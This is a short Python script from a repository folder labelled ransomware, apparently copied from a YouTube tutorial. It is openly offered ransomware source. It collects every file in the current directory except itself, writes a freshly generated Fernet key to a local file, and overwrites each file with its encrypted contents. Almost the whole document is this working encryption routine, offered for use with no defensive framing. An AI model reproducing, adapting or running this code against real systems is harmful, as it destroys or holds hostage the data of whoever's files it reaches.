hacker-scripts-python/network-chuck/ransomware/givemeyourmoney.py

31 lines
745 B
Python
Raw Normal View History

2023-08-19 22:30:40 -04:00
#!/usr/bin/env python3
"""
This is a script taken from NetworkChuck YouTube channel. It is a simple
python script. See my latest post at https://0x8c.org for more.
"""
import os
from cryptography.fernet import Fernet
files = []
for file in os.listdir():
if file == "givemeyourmoney.py" or file == "gotchabitch.key":
continue
if os.path.isfile(file):
files.append(file)
print(files)
key = Fernet.generate_key()
with open("gotchabitch.key", "wb") as gotchabitch:
gotchabitch.write(key)
for file in files:
with open(file, "rb") as thefile:
contents = thefile.read()
contents_encrypted = Fernet(key).encrypt(contents)
with open(file, "wb") as thefile:
thefile.write(contents_encrypted)